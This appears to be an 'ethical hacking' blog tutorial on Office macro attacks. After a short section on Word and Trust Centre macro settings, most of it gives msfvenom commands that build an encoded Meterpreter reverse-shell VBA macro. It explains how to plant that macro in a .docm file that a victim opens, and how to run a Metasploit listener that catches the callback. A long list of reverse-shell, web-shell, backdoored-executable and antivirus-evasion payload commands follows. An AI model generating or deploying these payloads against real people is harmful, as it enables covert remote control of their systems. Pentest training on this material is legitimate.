Ethical Hacking: How to Hack (Part 12) Office Macro Attacks
This is a follow on to my previous article, “Ethical Hacking (Part 7): Metasploit Penetration Testing Framework”. I recommend you read that first as I’ll make assumptions about your knowledge of Metasploit and Venom.
What is an Office Macro?
They are a series of commands and instructions that you group together as a single command to accomplish a task automatically. They are written in Office Visual Basic (VBA) within Office products. They are extremely useful if put to good use. Unfortunately they can be exploited with disastrous effect so I’m going to explain how to mitigate and manage such attacks. Some companies really depend on macros so it’s not as simple as just saying disable all macros.
Macro Security
I have Office installed on my Mac. The macro settings can be found by clicking on the “Word” application menu, then “Preferences”, then “Security”.
The recommended option which is a sort of middle ground is “Disable all micros with notification”. If you are not a developer you should disable “Trust access to VBA project object model”.
If you are a Windows user you have one additional feature called, “Trust Centre”. If your company heavily uses macros you are probably better off using Windows than OSX.
In Windows the settings, the above can be found by clicking on the “File” menu, then “Options”, then “Trust Centre”, then “Trust Centre Settings”.
Under the “Macro Settings” menu, probably your best option is “Disable all micros with notification” and disable “Trust access to VBA project object model”.
One feature that Trust Centre has on Windows which OSX does not is, “Trusted Locations”. This allows for a company to centrally store vetted macros that are safe to use. That is why I said if you company heavily uses macros it probably is better to use Windows to make use of “Trusted Locations”.
Let’s get started…
- Install Kali Linux — tutorial here
- Install Metasploit Penetration Testing Framework — tutorial here
Preparing the payload…
I briefly touched on Venom in my Metasploit article, it is an absolute beast.
All that is required to create a macro payload which is very stealthy and many commercial virus scanners won’t detect is like this.
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -e x86/shikata_ga_nai -f vba-psh > macro.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of vba-psh file: 6774 bytes- “windows/meterpreter/reverse_tcp” is the payload
- “192.168.1.2” is the host the macro will connect back to. It is my Kali instance on my LAN. If you wanted this to work remotely over the Internet this should be the publicly routable IP. You will probably need to configure NAT and firewall rules depending on your network topology.
- TCP “3333” is the port on which the Metasploit Console will listen on. I say “TCP” as this is a “reverse_tcp” payload. You could also use a “reverse_http” payload if you prefer.
- “x86/shikata_ga_nai” is the encoder
- “vba-psh” is the type of file to create
- “macro.txt” contains the macro
Open Word and create yourself a dummy macro. In the version of Word I have on my Mac, I go to “Tools”, then “Macro”, then “Macros”. Just create any macro as we will just replace it with the macro from “macro.txt”. Make sure you save your Word document as a “Macro-Enabled Document”. The document will be called, “*.docm” for Word and, “*.xlsm” for Excel. I suspect most Office documents will just have an “m” appended to their standard file formats. When the file is opened it will execute the exploit.
Preparing the console…
As I have mentioned already I’m not going to cover the installation of Metasploit or the basic usage as I have covered this already in my other article.
Launch the Metasploit console like this.
kali@kali:~$ msfconsole
, ,
/
((__---,,,---__))
(_) O O (_)_________
_ / |
o_o M S F |
_____ | *
||| WW|||
||| |||=[ metasploit v5.0.101-dev ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]Metasploit tip: To save all commands executed since start up to a file, use the makerc commandmsf5 >And prepare for the connection like this…
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf5 exploit(multi/handler) > set lport 3333
lport => 3333
msf5 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 192.168.1.2:3333The settings in the console need to match the payload you created with Venom.
When the victim opens the Office document the macro will be run and you will see the host connect. When they do you will have a remote shell to their system which I’ve covered in my other article.
Other interesting Venom payloads…
Binaries
Create a simple TCP Payload for Windows
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f exe > example.exeCreate a simple HTTP Payload for Windows
root@kali:~# msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.2 LPORT=3333 -f exe > example.exeCreates a simple TCP Shell for Linux
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f elf > example.elfCreates a simple TCP Shell for Mac
root@kali:~# msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f macho > example.machoCreats a simple TCP Payload for Android
root@kali:~# msfvenom -p android/meterpreter/reverse/tcp LHOST=192.168.1.2 LPORT=3333 R > example.apkWeb Payloads
Create a Simple TCP Shell for PHP
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f raw > example.phpCreate a Simple TCP Shell for ASP
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f asp > example.aspCreate a Simple TCP Shell for Javascript
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f raw > example.jspCreate a Simple TCP Shell for WAR
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f war > example.warWindows Payloads
Creates a backdoor in an executable file (.exe)
root@kali:~# msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f exe > example.exeCreate a simple TCP payload with shikata_ga_nai encoder, like we did with the VBA macro.
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -e x86/shikata_ga_nai -b ‘x00’ -i 3 -f exe > example.exeBinds an exe with a Payload and encodes it
root@kali:~# msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -e x86/shikata_ga_nai -i 3 -b “x00” -f exe > example.exeFor the full list on Venom encoders…
root@kali:~# msfvenom -l encodersFramework Encoders [--encoder <value>]
======================================Name Rank Description
---- ---- -----------
cmd/brace low Bash Brace Expansion Command Encoder
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Bourne ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
ruby/base64 great Ruby Base64 Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/xor_context normal Hostname-based Context Keyed Payload Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/service manual Register Service
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
x86/xor_dynamic normal Dynamic key XOR Encoder